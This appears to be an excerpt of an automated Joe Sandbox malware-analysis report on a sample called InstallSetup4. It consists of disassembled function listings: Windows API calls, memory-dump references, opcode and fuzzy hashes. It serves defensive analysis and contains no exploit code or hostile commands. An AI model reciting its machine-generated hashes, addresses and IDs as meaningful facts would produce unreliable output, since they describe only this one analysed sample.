                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                                            • Instruction ID: 64249f1610b479570df181ce2e9e182bf10c6facee3c5f7fb09e5bef7ea49c41
                                                                                            • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                                            • Instruction Fuzzy Hash: E6E0E672010109BFEF095F90DD4AD7B7B1DE708310F11492EF906D5051E6B5E9305674
                                                                                            Function 004060CA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E7,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                            • Instruction ID: a77d82ba430c16999eb1f2306cb11816df14181100402a9e04059793f1b3015d
                                                                                            • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                            • Instruction Fuzzy Hash: 21E08632150219ABCF10DF948C00EEB3B9CFF04390F018436FD11E3040D630E92197A4
                                                                                            Function 004060F9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349D,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040610D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                            • Instruction ID: 78408803ccc59d93ae5352641a5e7b8f709900c8df5e8e9e13d69f82a1dcf02f
                                                                                            • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                            • Instruction Fuzzy Hash: 8FE08C3220021ABBCF109E908C00EEB3FACEB003A0F014432FA26E6050D670E83097A4
                                                                                            Function 004034EA Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00403247,?), ref: 004034F8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 973152223-0
                                                                                            • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                            • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                            • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                            • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                            Function 00401FA9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,00428E20,76F923A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                              • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00428E20,76F923A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                              • Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
                                                                                              • Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
                                                                                              • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                              • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                              • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                              • Part of subcall function 00405B3A: CreateProcessW.KERNEL32(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                                                                              • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                                                                              • Part of subcall function 004069F6: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
                                                                                              • Part of subcall function 004069F6: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29
                                                                                              • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 2972824698-0
                                                                                            • Opcode ID: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
                                                                                            • Instruction ID: 72ab4701d282d41bfb99937ccb951c9b3d992b5a19319da95f503844dddfcbd3
                                                                                            • Opcode Fuzzy Hash: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
                                                                                            • Instruction Fuzzy Hash: EEF0F032804015ABCB20BBA199849DE72B5CF00318B21413FE102B21D1C77C0E42AA6E

                                                                                            Non-executed Functions

                                                                                            Function 0040571B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405779
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405788
                                                                                            • GetClientRect.USER32(?,?), ref: 004057C5
                                                                                            • GetSystemMetrics.USER32(00000002), ref: 004057CC
                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405868
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405889
                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405797
                                                                                              • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004058DB
                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004058F0
                                                                                            • ShowWindow.USER32(00000000), ref: 00405914
                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405919
                                                                                            • ShowWindow.USER32(00000008), ref: 00405963
                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
                                                                                            • CreatePopupMenu.USER32 ref: 004059A8
                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
                                                                                            • GetWindowRect.USER32(?,?), ref: 004059DC
                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
                                                                                            • OpenClipboard.USER32(00000000), ref: 00405A3D
                                                                                            • EmptyClipboard.USER32 ref: 00405A43
                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405A59
                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
                                                                                            • CloseClipboard.USER32 ref: 00405A9E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                            • String ID: {
                                                                                            • API String ID: 590372296-366298937
                                                                                            • Opcode ID: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
                                                                                            • Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
                                                                                            • Opcode Fuzzy Hash: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
                                                                                            • Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58
                                                                                            Function 004049C7 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 275stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404A16
                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404A40
                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404AFC
                                                                                            • lstrcmpiW.KERNEL32(004326A0,0042CA68,00000000,?,?), ref: 00404B2E
                                                                                            • lstrcatW.KERNEL32(?,004326A0), ref: 00404B3A
                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C
                                                                                              • Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE
                                                                                              • Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,0043F000,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                                                                              • Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                                                                              • Part of subcall function 00406805: CharNextW.USER32(?,0043F000,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                                                                              • Part of subcall function 00406805: CharPrevW.USER32(?,?,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                                                            • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A
                                                                                              • Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                                                              • Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
                                                                                              • Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                            • String ID: A
                                                                                            • API String ID: 2624150263-3554254475
                                                                                            • Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                                                            • Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
                                                                                            • Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                                                            • Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69
                                                                                            Function 004021AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 0040226E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateInstance
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                                            • API String ID: 542301482-3067928993
                                                                                            • Opcode ID: 54fcaebf65a6d80a769d2ffe25eeb1568fba929b3fba522b5b89cb6b807999ae
                                                                                            • Instruction ID: f0c409d0c9855dc16f3492d495f607d4fcaf843261c47ee8c1995525671fe781
                                                                                            • Opcode Fuzzy Hash: 54fcaebf65a6d80a769d2ffe25eeb1568fba929b3fba522b5b89cb6b807999ae
                                                                                            • Instruction Fuzzy Hash: 76411471A00208AFCB40DFE4C989EAD7BB5FF48308B20457AF515EB2D1DB799982CB54
                                                                                            Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFindFirst
                                                                                            • String ID:
                                                                                            • API String ID: 1974802433-0
                                                                                            • Opcode ID: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
                                                                                            • Instruction ID: 4f8030157269cd498ea314d5a86e386b0cfb994e1dea9c94a4400a3869289cfc
                                                                                            • Opcode Fuzzy Hash: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
                                                                                            • Instruction Fuzzy Hash: 17F08C71A04104AAD701EBE4EE499AEB378EF14324F60457BE102F31E0DBB85E159B2A
                                                                                            Function 00406DC6 Relevance: .3, Instructions: 334COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                                                                            • Instruction ID: a5eb8001d75a17d38d83411349fde439c8a9064fda1b18d7f978e280ae41e255
                                                                                            • Opcode Fuzzy Hash: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                                                                            • Instruction Fuzzy Hash: ACE19C71A04709DFCB24CF58C880BAABBF1FF45305F15852EE496A72D1E378AA51CB05
                                                                                            Function 0040759D Relevance: .3, Instructions: 300COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                                                            • Instruction ID: e409ec8ffb443055957628c835c79614664982182129ebc37b3e11cb9bcd83e5
                                                                                            • Opcode Fuzzy Hash: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                                                            • Instruction Fuzzy Hash: ECC14772E04219CBCF18CF68C4905EEBBB2BF98354F25866AD85677380D7346942CF95
                                                                                            Function 00404F43 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404F5B
                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404F66
                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
                                                                                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
                                                                                            • SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
                                                                                            • DeleteObject.GDI32(00000000), ref: 0040503D
                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F
                                                                                              • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00405181
                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
                                                                                            • ShowWindow.USER32(?,00000005), ref: 0040519F
                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
